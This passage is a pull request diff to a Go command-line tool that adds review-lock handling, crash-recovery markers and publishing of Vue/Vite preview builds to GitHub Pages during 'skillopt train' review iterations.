### PR TITLE
feat(skillopt): publish vue train previews

### DIFF
--- a/internal/cli/skillopt.go
+++ b/internal/cli/skillopt.go
@@ -36,6 +36,8 @@ var newSkillOptGitHubClient = func() github.Client {
 
 var skillOptTrainOptimizerRunner subprocess.Runner = subprocess.ExecRunner{}
 
+var skillOptTrainPreviewRunner subprocess.Runner = subprocess.ExecRunner{}
+
 func runSkillOpt(args []string, stdout, stderr io.Writer) int {
 	if len(args) == 0 || args[0] == "-h" || args[0] == "--help" {
 		printSkillOptUsage(stdout)
@@ -598,8 +600,43 @@ func continueSkillOptTrain(ctx context.Context, paths config.Paths, store *db.St
 			},
 		}, nil
 	case skillopt.TrainStateOptionsGenerated:
-		output.Lines = []string{"next: options already generated; publish the human review packet"}
-		return output, nil
+		releaseReviewLock, _, err := acquireSkillOptTrainReviewLock(ctx, store, session.ID, iteration.ID)
+		if err != nil {
+			return output, err
+		}
+		defer func() {
+			_ = releaseReviewLock(context.Background())
+		}()
+		session, iteration, counts, err = loadSkillOptTrainStatus(ctx, store, request.SessionID)
+		if err != nil {
+			return skillOptTrainContinueOutput{}, err
+		}
+		summary = skillopt.BuildTrainStatusSummary(session, iteration, counts)
+		output = skillOptTrainContinueOutput{Summary: summary, Counts: counts}
+		if iteration == nil {
+			output.Lines = []string{"next: train session has no iteration to continue"}
+			return output, nil
+		}
+		if summary.CurrentPhase != skillopt.TrainStateOptionsGenerated {
+			output.Lines = []string{fmt.Sprintf("next: %s", summary.NextAction)}
+			return output, nil
+		}
+		result, err := publishSkillOptTrainReview(ctx, paths, store, session, *iteration)
+		if err != nil {
+			return skillOptTrainContinueOutput{}, err
+		}
+		updatedSession, updatedIteration, updatedCounts, err := loadSkillOptTrainStatus(ctx, store, session.ID)
+		if err != nil {
+			return skillOptTrainContinueOutput{}, err
+		}
+		updatedSummary := skillopt.BuildTrainStatusSummary(updatedSession, updatedIteration, updatedCounts)
+		lines := []string{
+			fmt.Sprintf("review: %s", result.URL),
+			fmt.Sprintf("review_repo: %s", result.Repo.FullName()),
+			fmt.Sprintf("preview_urls: %d", result.PreviewURLs),
+			"next: wait for feedback, then run train continue after sync",
+		}
+		return skillOptTrainContinueOutput{Summary: updatedSummary, Counts: updatedCounts, ContinueReady: true, Lines: lines}, nil
 	case skillopt.TrainStateFeedbackSynced, skillopt.TrainStateTrainingPackageCreated, skillopt.TrainStateOptimizerCompleted:
 		if iteration == nil {
 			output.Lines = []string{"next: train session has no iteration to continue"}
@@ -1917,6 +1954,8 @@ var errSkillOptTrainOptimizerBusy = errors.New("skillopt train optimizer is alre
 
 var errSkillOptTrainCandidateReviewBusy = errors.New("skillopt train candidate review is already publishing")
 
+var errSkillOptTrainReviewBusy = errors.New("skillopt train review is already publishing")
+
 var errSkillOptTrainStartNextBusy = errors.New("skillopt train next iteration is already starting")
 
 const skillOptTrainGenerationLockTTL = 2 * time.Hour
@@ -1928,6 +1967,8 @@ const skillOptTrainOptimizerLockTTL = 4 * time.Hour
 const skillOptTrainOptimizerLockBuffer = 10 * time.Minute
 
 const skillOptTrainCandidateReviewLockTTL = 30 * time.Minute
+
+const skillOptTrainReviewLockTTL = 30 * time.Minute
 
 const skillOptTrainStartNextLockTTL = 30 * time.Minute
 
@@ -1964,6 +2005,41 @@ func skillOptTrainCandidateReviewLockKey(sessionID string, iterationID string) s
 		return "skillopt-train-candidate-review:" + sessionID
 	}
 	return "skillopt-train-candidate-review:" + sessionID + ":" + iterationID
+}
+
+func acquireSkillOptTrainReviewLock(ctx context.Context, store *db.Store, sessionID string, iterationID string) (func(context.Context) error, bool, error) {
+	key := skillOptTrainReviewLockKey(sessionID, iterationID)
+	token, err := newRuntimeLockOwnerToken()
+	if err != nil {
+		return noopAgentReservationRelease, false, err
+	}
+	now := time.Now().UTC()
+	ownerJobID := localAgentJobID("skillopt-train-review", strings.TrimSpace(sessionID))
+	acquired, err := store.AcquireResourceLock(ctx, db.ResourceLock{
+		ResourceKey: key,
+		OwnerJobID:  ownerJobID,
+		OwnerToken:  token,
+		ExpiresAt:   now.Add(skillOptTrainReviewLockTTL).Format(time.RFC3339Nano),
+	}, now)
+	if err != nil {
+		return noopAgentReservationRelease, false, err
+	}
+	if !acquired {
+		return noopAgentReservationRelease, false, fmt.Errorf("%w: %s", errSkillOptTrainReviewBusy, key)
+	}
+	return func(releaseCtx context.Context) error {
+		_, err := store.ReleaseResourceLock(releaseCtx, key, ownerJobID, token)
+		return err
+	}, true, nil
+}
+
+func skillOptTrainReviewLockKey(sessionID string, iterationID string) string {
+	sessionID = strings.TrimSpace(sessionID)
+	iterationID = strings.TrimSpace(iterationID)
+	if iterationID == "" {
+		return "skillopt-train-review:" + sessionID
+	}
+	return "skillopt-train-review:" + sessionID + ":" + iterationID
 }
 
 func acquireSkillOptTrainStartNextLock(ctx context.Context, store *db.Store, sessionID string) (func(context.Context) error, bool, error) {
@@ -2351,6 +2427,8 @@ func generateSkillOptTrainSingleItemOptions(ctx context.Context, store *db.Store
 	generatedItem := skillOptTrainGeneratedItemOptions{ItemID: item.ItemID}
 	replacementOptions := make([]db.EvalReviewOption, 0, len(roles))
 	artifactRecords := make([]db.EvalArtifact, 0, len(roles))
+	wantsVuePreviewBundle := skillOptTrainWantsVuePreviewBundle(session)
+	requiresVuePreviewBundle := skillOptTrainRequiresVuePreviewBundle(session)
 	for _, role := range roles {
 		prompt := buildSkillOptTrainGenerationPrompt(session, iteration, run, item, role, rankedRun)
 		output, err := dispatchLocalAgentJob(ctx, store, localAgentDispatchRequest{
@@ -2375,12 +2453,33 @@ func generateSkillOptTrainSingleItemOptions(ctx context.Context, store *db.Store
 		if rankedRun {
 			artifactRole = "option-" + role
 		}
-		artifactRecord, err := prepareReviewItemContentArtifact(blobStore, run.ID, item.ItemID, artifactRole, []byte(output.Result.Summary), "text/markdown", "text")
+		artifactContent := []byte(output.Result.Summary)
+		artifactMediaType := "text/markdown"
+		artifactDriver := "text"
+		var previewBundleMetadata *skillopt.PreviewBundleMetadata
+		if wantsVuePreviewBundle {
+			bundle, err := skillopt.ParsePreviewBundle([]byte(output.Result.Summary))
+			if err != nil {
+				if requiresVuePreviewBundle {
+					return skillOptTrainGeneratedItemOptions{}, fmt.Errorf("generate %s for %s: preview bundle: %w", role, item.ItemID, err)
+				}
+			} else {
+				artifactContent, err = json.Marshal(bundle)
+				if err != nil {
+					return skillOptTrainGeneratedItemOptions{}, fmt.Errorf("generate %s for %s: encode preview bundle: %w", role, item.ItemID, err)
+				}
+				metadata := bundle.Metadata()
+				previewBundleMetadata = &metadata
+				artifactMediaType = "application/json"
+				artifactDriver = skillopt.TrainPreviewRendererVueVite
+			}
+		}
+		artifactRecord, err := prepareReviewItemContentArtifact(blobStore, run.ID, item.ItemID, artifactRole, artifactContent, artifactMediaType, artifactDriver)
 		if err != nil {
 			return skillOptTrainGeneratedItemOptions{}, err
 		}
 		artifactRecords = append(artifactRecords, artifactRecord)
-		optionMetadata := skillOptTrainGeneratedOptionMetadata(output, prompt)
+		optionMetadata := skillOptTrainGeneratedOptionMetadata(output, prompt, previewBundleMetadata)
 		if rankedRun {
 			replacementOptions = append(replacementOptions, db.EvalReviewOption{
 				RunID:        run.ID,
@@ -2417,6 +2516,682 @@ func generateSkillOptTrainSingleItemOptions(ctx context.Context, store *db.Store
 		generatedItem.ReviewItem = &item
 	}
 	return generatedItem, nil
+}
+
+func skillOptTrainWantsVuePreviewBundle(session db.SkillOptTrainSession) bool {
+	policy := skillopt.ResolveTrainPreviewPolicy(session)
+	return policy.Mode != skillopt.TrainPreviewModeNone && policy.Renderer == skillopt.TrainPreviewRendererVueVite
+}
+
+func skillOptTrainRequiresVuePreviewBundle(session db.SkillOptTrainSession) bool {
+	policy := skillopt.ResolveTrainPreviewPolicy(session)
+	return policy.Mode == skillopt.TrainPreviewModeRequired && policy.Renderer == skillopt.TrainPreviewRendererVueVite
+}
+
+type skillOptTrainReviewPublishResult struct {
+	Repo        github.Repository
+	IssueNumber int64
+	URL         string
+	PreviewURLs int
+}
+
+func publishSkillOptTrainReview(ctx context.Context, paths config.Paths, store *db.Store, session db.SkillOptTrainSession, iteration db.SkillOptTrainIteration) (skillOptTrainReviewPublishResult, error) {
+	if err := skillopt.CanTransitionTrainIteration(iteration.State, skillopt.TrainStateReviewPublished); err != nil {
+		return skillOptTrainReviewPublishResult{}, err
+	}
+	if strings.TrimSpace(iteration.EvalRunID) == "" {
+		return skillOptTrainReviewPublishResult{}, fmt.Errorf("train iteration %s has no eval run id", iteration.ID)
+	}
+	if recovered, ok, err := recoverSkillOptTrainReviewPublication(ctx, paths, store, session, iteration); err != nil {
+		return skillOptTrainReviewPublishResult{}, err
+	} else if ok {
+		return recovered, nil
+	}
+	previewURLs, err := publishSkillOptTrainPreviewURLs(ctx, paths, store, session, iteration)
+	if err != nil {
+		return skillOptTrainReviewPublishResult{}, err
+	}
+	run, err := store.GetEvalRun(ctx, iteration.EvalRunID)
+	if err != nil {
+		return skillOptTrainReviewPublishResult{}, err
+	}
+	repo, err := resolveSkillOptFeedbackRepo(ctx, paths, store, run, "")
+	if err != nil {
+		return skillOptTrainReviewPublishResult{}, err
+	}
+	publishingMetadata := map[string]any{
+		"status":       "publishing",
+		"repo":         repo.FullName(),
+		"preview_urls": previewURLs,
+		"started_at":   time.Now().UTC().Format(time.RFC3339Nano),
+		"source":       "gitmoot skillopt train continue",
+	}
+	if err := writeSkillOptTrainReviewRecovery(paths, session, iteration, publishingMetadata); err != nil {
+		return skillOptTrainReviewPublishResult{}, fmt.Errorf("write review pre-publish recovery marker: %w", err)
+	}
+	session.MetadataJSON = mergeSkillOptTrainMetadata(session.MetadataJSON, "review", publishingMetadata)
+	iteration.MetadataJSON = mergeSkillOptTrainMetadata(iteration.MetadataJSON, "review", publishingMetadata)
+	if err := store.UpsertSkillOptTrainSessionAndIteration(ctx, session, iteration); err != nil {
+		return skillOptTrainReviewPublishResult{}, err
+	}
+	collector := feedback.GitHubCollector{BlobStore: artifact.NewStore(paths.ArtifactBlobs)}
+	body, err := collector.Body(ctx, store, run.ID)
+	if err != nil {
+		return skillOptTrainReviewPublishResult{}, err
+	}
+	client := newSkillOptGitHubClient()
+	postingMetadata := make(map[string]any, len(publishingMetadata)+2)
+	for key, value := range publishingMetadata {
+		postingMetadata[key] = value
+	}
+	postingMetadata["status"] = "posting_external"
+	postingMetadata["external_post_started_at"] = time.Now().UTC().Format(time.RFC3339Nano)
+	if err := writeSkillOptTrainReviewRecovery(paths, session, iteration, postingMetadata); err != nil {
+		return skillOptTrainReviewPublishResult{}, fmt.Errorf("write review external-post recovery marker: %w", err)
+	}
+	issue, err := client.CreateIssue(ctx, github.CreateIssueInput{
+		Repo:  repo,
+		Title: fmt.Sprintf("Gitmoot SkillOpt feedback: %s", strings.TrimSpace(run.ID)),
+		Body:  body,
+	})
+	if err != nil {
+		return skillOptTrainReviewPublishResult{}, err
+	}
+	published := feedback.GitHubPublishResult{Repo: repo, IssueNumber: issue.Number, URL: issue.URL, Mode: "issue"}
+	externalMetadata := map[string]any{
+		"status":       "published_external",
+		"repo":         published.Repo.FullName(),
+		"issue_number": published.IssueNumber,
+		"url":          published.URL,
+		"preview_urls": previewURLs,
+		"published_at": time.Now().UTC().Format(time.RFC3339Nano),
+		"source":       "gitmoot skillopt train continue",
+	}
+	externalMarkerErr := writeSkillOptTrainReviewRecovery(paths, session, iteration, externalMetadata)
+	session.State = skillopt.TrainStateReviewPublished
+	iteration.State = skillopt.TrainStateReviewPublished
+	iteration.IssueRepo = published.Repo.FullName()
+	iteration.IssueNumber = published.IssueNumber
+	iteration.IssueURL = published.URL
+	dbMetadata := make(map[string]any, len(externalMetadata))
+	for key, value := range externalMetadata {
+		dbMetadata[key] = value
+	}
+	dbMetadata["status"] = "published"
+	session.MetadataJSON = mergeSkillOptTrainMetadata(session.MetadataJSON, "review", dbMetadata)
+	iteration.MetadataJSON = mergeSkillOptTrainMetadata(iteration.MetadataJSON, "review", dbMetadata)
+	if err := store.UpsertSkillOptTrainSessionAndIteration(ctx, session, iteration); err != nil {
+		if externalMarkerErr != nil {
+			return skillOptTrainReviewPublishResult{}, fmt.Errorf("%w; review was published at %s but recovery marker write failed: %v", err, published.URL, externalMarkerErr)
+		}
+		return skillOptTrainReviewPublishResult{}, err
+	}
+	if externalMarkerErr != nil {
+		return skillOptTrainReviewPublishResult{}, fmt.Errorf("review was published at %s and recorded in local state but recovery marker write failed: %w", published.URL, externalMarkerErr)
+	}
+	_ = removeSkillOptTrainReviewRecovery(paths, session, iteration)
+	return skillOptTrainReviewPublishResult{Repo: published.Repo, IssueNumber: published.IssueNumber, URL: published.URL, PreviewURLs: previewURLs}, nil
+}
+
+func recoverSkillOptTrainReviewPublication(ctx context.Context, paths config.Paths, store *db.Store, session db.SkillOptTrainSession, iteration db.SkillOptTrainIteration) (skillOptTrainReviewPublishResult, bool, error) {
+	review, ok, err := readSkillOptTrainReviewRecovery(paths, session, iteration)
+	if err != nil || !ok {
+		return skillOptTrainReviewPublishResult{}, ok, err
+	}
+	status := metadataString(review, "status")
+	if status == "posting_external" {
+		return skillOptTrainReviewPublishResult{}, true, errors.New("train review publication was interrupted after the external GitHub post started; inspect the review repo before retrying to avoid duplicate issues")
+	}
+	if status != "published_external" {
+		return skillOptTrainReviewPublishResult{}, false, nil
+	}
+	repo, err := daemon.ParseRepository(metadataString(review, "repo"))
+	if err != nil {
+		return skillOptTrainReviewPublishResult{}, true, err
+	}
+	issueNumber := int64(metadataNumber(review, "issue_number"))
+	url := metadataString(review, "url")
+	previewURLs := metadataNumber(review, "preview_urls")
+	session.State = skillopt.TrainStateReviewPublished
+	iteration.State = skillopt.TrainStateReviewPublished
+	iteration.IssueRepo = repo.FullName()
+	iteration.IssueNumber = issueNumber
+	iteration.IssueURL = url
+	metadata := map[string]any{
+		"status":       "published",
+		"repo":         repo.FullName(),
+		"issue_number": issueNumber,
+		"url":          url,
+		"preview_urls": previewURLs,
+		"published_at": time.Now().UTC().Format(time.RFC3339Nano),
+		"source":       "gitmoot skillopt train continue",
+	}
+	session.MetadataJSON = mergeSkillOptTrainMetadata(session.MetadataJSON, "review", metadata)
+	iteration.MetadataJSON = mergeSkillOptTrainMetadata(iteration.MetadataJSON, "review", metadata)
+	if err := store.UpsertSkillOptTrainSessionAndIteration(ctx, session, iteration); err != nil {
+		return skillOptTrainReviewPublishResult{}, true, err
+	}
+	_ = removeSkillOptTrainReviewRecovery(paths, session, iteration)
+	return skillOptTrainReviewPublishResult{Repo: repo, IssueNumber: issueNumber, URL: url, PreviewURLs: previewURLs}, true, nil
+}
+
+func writeSkillOptTrainReviewRecovery(paths config.Paths, session db.SkillOptTrainSession, iteration db.SkillOptTrainIteration, metadata map[string]any) error {
+	path := skillOptTrainReviewRecoveryPath(paths, session, iteration)
+	if path == "" {
+		return errors.New("review recovery path is required")
+	}
+	if err := os.MkdirAll(filepath.Dir(path), 0o700); err != nil {
+		return err
+	}
+	encoded, err := json.MarshalIndent(metadata, "", "  ")
+	if err != nil {
+		return err
+	}
+	encoded = append(encoded, '\n')
+	tmpPath := fmt.Sprintf("%s.tmp.%d", path, os.Getpid())
+	if err := os.WriteFile(tmpPath, encoded, 0o600); err != nil {
+		return err
+	}
+	if err := os.Rename(tmpPath, path); err != nil {
+		_ = os.Remove(tmpPath)
+		return err
+	}
+	return nil
+}
+
+func readSkillOptTrainReviewRecovery(paths config.Paths, session db.SkillOptTrainSession, iteration db.SkillOptTrainIteration) (map[string]any, bool, error) {
+	path := skillOptTrainReviewRecoveryPath(paths, session, iteration)
+	if path == "" {
+		return nil, false, nil
+	}
+	content, err := os.ReadFile(path)
+	if errors.Is(err, os.ErrNotExist) {
+		return nil, false, nil
+	}
+	if err != nil {
+		return nil, true, err
+	}
+	var metadata map[string]any
+	if err := json.Unmarshal(content, &metadata); err != nil {
+		return nil, true, fmt.Errorf("read review recovery marker %s: %w", path, err)
+	}
+	return metadata, true, nil
+}
+
+func removeSkillOptTrainReviewRecovery(paths config.Paths, session db.SkillOptTrainSession, iteration db.SkillOptTrainIteration) error {
+	path := skillOptTrainReviewRecoveryPath(paths, session, iteration)
+	if path == "" {
+		return nil
+	}
+	if err := os.Remove(path); err != nil && !errors.Is(err, os.ErrNotExist) {
+		return err
+	}
+	return nil
+}
+
+func skillOptTrainReviewRecoveryPath(paths config.Paths, session db.SkillOptTrainSession, iteration db.SkillOptTrainIteration) string {
+	if strings.TrimSpace(paths.Home) == "" {
+		return ""
+	}
+	name := skillOptCandidateReviewRecoveryName(session.ID, iteration.ID)
+	if name == "" {
+		return ""
+	}
+	return filepath.Join(paths.Home, "skillopt", "reviews", name+".json")
+}
+
+func publishSkillOptTrainPreviewURLs(ctx context.Context, paths config.Paths, store *db.Store, session db.SkillOptTrainSession, iteration db.SkillOptTrainIteration) (int, error) {
+	policy := skillopt.ResolveTrainPreviewPolicy(session)
+	if policy.Mode == skillopt.TrainPreviewModeNone || policy.Renderer == skillopt.TrainPreviewRendererNone || policy.Publisher == skillopt.TrainPreviewPublisherNone {
+		return 0, nil
+	}
+	if policy.Renderer != skillopt.TrainPreviewRendererVueVite || policy.Publisher != skillopt.TrainPreviewPublisherGitHubPages {
+		if policy.Mode == skillopt.TrainPreviewModeRequired {
+			return 0, fmt.Errorf("preview renderer %s with publisher %s is not implemented", policy.Renderer, policy.Publisher)
+		}
+		return 0, nil
+	}
+	run, err := store.GetEvalRun(ctx, iteration.EvalRunID)
+	if err != nil {
+		return 0, err
+	}
+	options, err := store.ListEvalReviewOptions(ctx, run.ID, "")
+	if err != nil {
+		return 0, err
+	}
+	if len(options) == 0 {
+		if policy.Mode == skillopt.TrainPreviewModeRequired {
+			return 0, fmt.Errorf("train run %s has no generated options to publish previews", run.ID)
+		}
+		return 0, nil
+	}
+	blobStore := artifact.NewStore(paths.ArtifactBlobs)
+	previewRepo, err := previewRepoRecord(ctx, store, policy)
+	if err != nil {
+		if policy.Mode == skillopt.TrainPreviewModeRequired {
+			return 0, err
+		}
+		return convertOptionalPreviewBundlesToFallback(ctx, store, blobStore, options)
+	}
+	if err := requireCleanPreviewRepo(ctx, previewRepo.CheckoutPath); err != nil {
+		if policy.Mode == skillopt.TrainPreviewModeRequired {
+			return 0, err
+		}
+		return convertOptionalPreviewBundlesToFallback(ctx, store, blobStore, options)
+	}
+	publishedCount := 0
+	for _, option := range options {
+		metadata := optionMetadataMap(option.MetadataJSON)
+		if metadataStringValue(metadata, "preview_url") != "" || metadataStringValue(metadata, "url") != "" {
+			publishedCount++
+			continue
+		}
+		if metadata["preview_bundle"] == nil {
+			if policy.Mode == skillopt.TrainPreviewModeRequired {
+				return publishedCount, fmt.Errorf("item %s option %s is missing preview bundle metadata", option.ItemID, option.Label)
+			}
+			continue
+		}
+		record, err := store.GetEvalArtifact(ctx, option.ArtifactID)
+		if err != nil {
+			return publishedCount, fmt.Errorf("item %s option %s artifact: %w", option.ItemID, option.Label, err)
+		}
+		content, err := blobStore.Read(record.Hash)
+		if err != nil {
+			return publishedCount, fmt.Errorf("item %s option %s preview bundle blob: %w", option.ItemID, option.Label, err)
+		}
+		bundle, err := skillopt.ParsePreviewBundle(content)
+		if err != nil {
+			if policy.Mode == skillopt.TrainPreviewModeRequired {
+				return publishedCount, fmt.Errorf("item %s option %s preview bundle: %w", option.ItemID, option.Label, err)
+			}
+			continue
+		}
+		distDir, cleanup, err := renderVueVitePreviewBundle(ctx, bundle)
+		if err != nil {
+			if policy.Mode == skillopt.TrainPreviewModeRequired {
+				return publishedCount, fmt.Errorf("item %s option %s render preview: %w", option.ItemID, option.Label, err)
+			}
+			continue
+		}
+		route, err := skillOptPreviewRoute(policy.RouteTemplate, run.ID, option.ItemID, option.Label)
+		if err != nil {
+			_ = cleanup()
+			return publishedCount, err
+		}
+		url, err := publishGitHubPagesPreview(ctx, previewRepo, route, distDir)
+		_ = cleanup()
+		if err != nil {
+			if policy.Mode == skillopt.TrainPreviewModeRequired {
+				return publishedCount, fmt.Errorf("item %s option %s publish preview: %w", option.ItemID, option.Label, err)
+			}
+			continue
+		}
+		metadata["preview_url"] = url
+		metadata["preview_route"] = route
+		metadata["preview_repo"] = previewRepo.FullName()
+		option.MetadataJSON = encodeOptionMetadata(metadata)
+		if err := store.UpsertEvalReviewOption(ctx, option); err != nil {
+			return publishedCount, err
+		}
+		publishedCount++
+	}
+	if policy.Mode == skillopt.TrainPreviewModeRequired && publishedCount != len(options) {
+		return publishedCount, fmt.Errorf("required preview run has %d/%d preview URLs", publishedCount, len(options))
+	}
+	if policy.Mode == skillopt.TrainPreviewModeOptional {
+		freshOptions, err := store.ListEvalReviewOptions(ctx, run.ID, "")
+		if err != nil {
+			return publishedCount, err
+		}
+		if _, err := convertOptionalPreviewBundlesToFallback(ctx, store, blobStore, freshOptions); err != nil {
+			return publishedCount, err
+		}
+	}
+	return publishedCount, nil
+}
+
+func convertOptionalPreviewBundlesToFallback(ctx context.Context, store *db.Store, blobStore artifact.Store, options []db.EvalReviewOption) (int, error) {
+	for _, option := range options {
+		metadata := optionMetadataMap(option.MetadataJSON)
+		if metadata["preview_bundle"] == nil || metadataStringValue(metadata, "preview_url") != "" || metadataStringValue(metadata, "url") != "" {
+			continue
+		}
+		record, err := store.GetEvalArtifact(ctx, option.ArtifactID)
+		if err != nil {
+			return 0, err
+		}
+		content, err := blobStore.Read(record.Hash)
+		if err != nil {
+			return 0, err
+		}
+		bundle, err := skillopt.ParsePreviewBundle(content)
+		if err != nil {
+			return 0, err
+		}
+		fallbackContent := []byte(previewBundleInlineFallback(bundle))
+		blob, err := blobStore.Put(fallbackContent)
+		if err != nil {
+			return 0, err
+		}
+		record.Hash = blob.Hash
+		record.MediaType = "text/markdown"
+		record.SizeBytes = blob.Size
+		record.Driver = "text"
+		if err := store.UpsertEvalArtifact(ctx, record); err != nil {
+			return 0, err
+		}
+		delete(metadata, "preview_bundle")
+		metadata["preview_fallback"] = "inline"
+		metadata["preview_fallback_renderer"] = skillopt.TrainPreviewRendererVueVite
+		option.MetadataJSON = encodeOptionMetadata(metadata)
+		if err := store.UpsertEvalReviewOption(ctx, option); err != nil {
+			return 0, err
+		}
+	}
+	return 0, nil
+}
+
+func previewBundleInlineFallback(bundle skillopt.PreviewBundle) string {
+	var builder strings.Builder
+	builder.WriteString("# Vue/Vite preview source\n\n")
+	builder.WriteString("A clickable preview was not available, so this option is included as inline Vue/Vite source for review.\n\n")
+	for _, file := range bundle.Files {
+		fmt.Fprintf(&builder, "## `%s`\n\n", file.Path)
+		writeSkillOptMarkdownFence(&builder, file.Content)
+		builder.WriteString("\n")
+	}
+	return builder.String()
+}
+
+func writeSkillOptMarkdownFence(builder *strings.Builder, content string) {
+	fence := "```"
+	for strings.Contains(content, fence) {
+		fence += "`"
+	}
+	builder.WriteString(fence)
+	builder.WriteString("text\n")
+	builder.WriteString(strings.TrimRight(content, "\n"))
+	builder.WriteString("\n")
+	builder.WriteString(fence)
+	builder.WriteString("\n")
+}
+
+func previewRepoRecord(ctx context.Context, store *db.Store, policy skillopt.TrainPreviewPolicy) (db.Repo, error) {
+	repoName := strings.TrimSpace(policy.Repo)
+	if repoName == "" {
+		return db.Repo{}, errors.New("preview repo is required")
+	}
+	repo, err := store.GetRepo(ctx, repoName)
+	if err != nil {
+		return db.Repo{}, fmt.Errorf("preview repo %s is not registered with a checkout path; run `gitmoot repo add %s --path /path/to/checkout`: %w", repoName, repoName, err)
+	}
+	if strings.TrimSpace(repo.CheckoutPath) == "" {
+		return db.Repo{}, fmt.Errorf("preview repo %s has no checkout path; run `gitmoot repo add %s --path /path/to/checkout`", repoName, repoName)
+	}
+	if _, err := os.Stat(repo.CheckoutPath); err != nil {
+		return db.Repo{}, fmt.Errorf("preview repo %s checkout is not ready: %w", repo.FullName(), err)
+	}
+	return repo, nil
+}
+
+func requireCleanPreviewRepo(ctx context.Context, checkout string) error {
+	result, err := skillOptTrainPreviewRunner.Run(ctx, checkout, "git", "status", "--porcelain")
+	if err != nil {
+		return fmt.Errorf("check preview repo status: %w", err)
+	}
+	if strings.TrimSpace(result.Stdout) != "" {
+		return fmt.Errorf("preview repo checkout %s is dirty; commit or clean it before publishing previews", checkout)
+	}
+	return nil
+}
+
+func renderVueVitePreviewBundle(ctx context.Context, bundle skillopt.PreviewBundle) (string, func() error, error) {
+	workDir, err := os.MkdirTemp("", "gitmoot-vue-preview-*")
+	if err != nil {
+		return "", nil, err
+	}
+	cleanup := func() error { return os.RemoveAll(workDir) }
+	for _, file := range bundle.Files {
+		target, err := safeJoinPreviewPath(workDir, file.Path)
+		if err != nil {
+			_ = cleanup()
+			return "", nil, err
+		}
+		if err := os.MkdirAll(filepath.Dir(target), 0o755); err != nil {
+			_ = cleanup()
+			return "", nil, err
+		}
+		if err := os.WriteFile(target, []byte(file.Content), 0o644); err != nil {
+			_ = cleanup()
+			return "", nil, err
+		}
+	}
+	if err := writeTrustedVueViteScaffold(workDir); err != nil {
+		_ = cleanup()
+		return "", nil, err
+	}
+	if _, err := skillOptTrainPreviewRunner.Run(ctx, workDir, "npm", "install", "--ignore-scripts"); err != nil {
+		_ = cleanup()
+		return "", nil, fmt.Errorf("npm install: %w", err)
+	}
+	if _, err := skillOptTrainPreviewRunner.Run(ctx, workDir, "npm", "run", "build"); err != nil {
+		_ = cleanup()
+		return "", nil, fmt.Errorf("%s: %w", bundle.BuildCommand, err)
+	}
+	distDir, err := safeJoinPreviewPath(workDir, bundle.DistDir)
+	if err != nil {
+		_ = cleanup()
+		return "", nil, err
+	}
+	if _, err := os.Stat(filepath.Join(distDir, "index.html")); err != nil {
+		_ = cleanup()
+		return "", nil, fmt.Errorf("preview build output missing index.html in %s: %w", bundle.DistDir, err)
+	}
+	return distDir, cleanup, nil
+}
+
+func publishGitHubPagesPreview(ctx context.Context, repo db.Repo, route string, distDir string) (string, error) {
+	checkout := strings.TrimSpace(repo.CheckoutPath)
+	if err := requireCleanPreviewRepo(ctx, checkout); err != nil {
+		return "", err
+	}
+	head, err := skillOptTrainPreviewRunner.Run(ctx, checkout, "git", "rev-parse", "HEAD")
+	if err != nil {
+		return "", fmt.Errorf("read preview repo head: %w", err)
+	}
+	headSHA := strings.TrimSpace(head.Stdout)
+	target, err := safeJoinPreviewPath(checkout, route)
+	if err != nil {
+		return "", err
+	}
+	if err := os.RemoveAll(target); err != nil {
+		return "", err
+	}
+	if err := copyDir(distDir, target); err != nil {
+		restorePreviewRoute(ctx, checkout, route, headSHA)
+		return "", err
+	}
+	if _, err := skillOptTrainPreviewRunner.Run(ctx, checkout, "git", "add", "--", route); err != nil {
+		restorePreviewRoute(ctx, checkout, route, headSHA)
+		return "", fmt.Errorf("git add preview route: %w", err)
+	}
+	status, err := skillOptTrainPreviewRunner.Run(ctx, checkout, "git", "status", "--porcelain", "--", route)
+	if err != nil {
+		restorePreviewRoute(ctx, checkout, route, headSHA)
+		return "", fmt.Errorf("check preview route status: %w", err)
+	}
+	if strings.TrimSpace(status.Stdout) != "" {
+		if _, err := skillOptTrainPreviewRunner.Run(ctx, checkout, "git", "commit", "-m", "Publish SkillOpt preview "+strings.TrimSuffix(route, "/")); err != nil {
+			restorePreviewRoute(ctx, checkout, route, headSHA)
+			return "", fmt.Errorf("git commit preview route: %w", err)
+		}
+		if _, err := skillOptTrainPreviewRunner.Run(ctx, checkout, "git", "push"); err != nil {
+			restorePreviewRoute(ctx, checkout, route, headSHA)
+			return "", fmt.Errorf("git push preview route: %w", err)
+		}
+	}
+	return githubPagesURL(repo, route), nil
+}
+
+func restorePreviewRoute(ctx context.Context, checkout string, route string, headSHA string) {
+	if strings.TrimSpace(headSHA) != "" {
+		_, _ = skillOptTrainPreviewRunner.Run(ctx, checkout, "git", "reset", "--hard", headSHA)
+	}
+	_, _ = skillOptTrainPreviewRunner.Run(ctx, checkout, "git", "clean", "-fd", "--", route)
+}
+
+func skillOptPreviewRoute(template string, runID string, itemID string, label string) (string, error) {
+	if strings.TrimSpace(template) == "" {
+		template = skillopt.DefaultTrainPreviewRouteTemplate
+	}
+	route := strings.ReplaceAll(template, "{run_id}", previewRouteSlug(runID))
+	route = strings.ReplaceAll(route, "{item_id}", previewRouteSlug(itemID))
+	route = strings.ReplaceAll(route, "{option_label}", previewRouteSlug(label))
+	route = strings.TrimSpace(route)
+	if route == "" {
+		return "", errors.New("preview route is required")
+	}
+	route = strings.TrimPrefix(route, "/")
+	clean := filepath.ToSlash(filepath.Clean(route))
+	if clean == "." || clean == ".." || strings.HasPrefix(clean, "../") || strings.Contains(clean, ":") {
+		return "", fmt.Errorf("preview route %q is unsafe", route)
+	}
+	if !strings.HasSuffix(clean, "/") {
+		clean += "/"
+	}
+	return clean, nil
+}
+
+func safeJoinPreviewPath(root string, relative string) (string, error) {
+	root = filepath.Clean(root)
+	relative = filepath.FromSlash(strings.TrimSpace(relative))
+	if filepath.IsAbs(relative) {
+		return "", fmt.Errorf("preview path %q must be relative", relative)
+	}
+	target := filepath.Clean(filepath.Join(root, relative))
+	if target != root && !strings.HasPrefix(target, root+string(os.PathSeparator)) {
+		return "", fmt.Errorf("preview path %q must stay inside %s", relative, root)
+	}
+	return target, nil
+}
+
+func copyDir(source string, target string) error {
+	entries, err := os.ReadDir(source)
+	if err != nil {
+		return err
+	}
+	if err := os.MkdirAll(target, 0o755); err != nil {
+		return err
+	}
+	for _, entry := range entries {
+		sourcePath := filepath.Join(source, entry.Name())
+		targetPath := filepath.Join(target, entry.Name())
+		if entry.IsDir() {
+			if err := copyDir(sourcePath, targetPath); err != nil {
+				return err
+			}
+			continue
+		}
+		content, err := os.ReadFile(sourcePath)
+		if err != nil {
+			return err
+		}
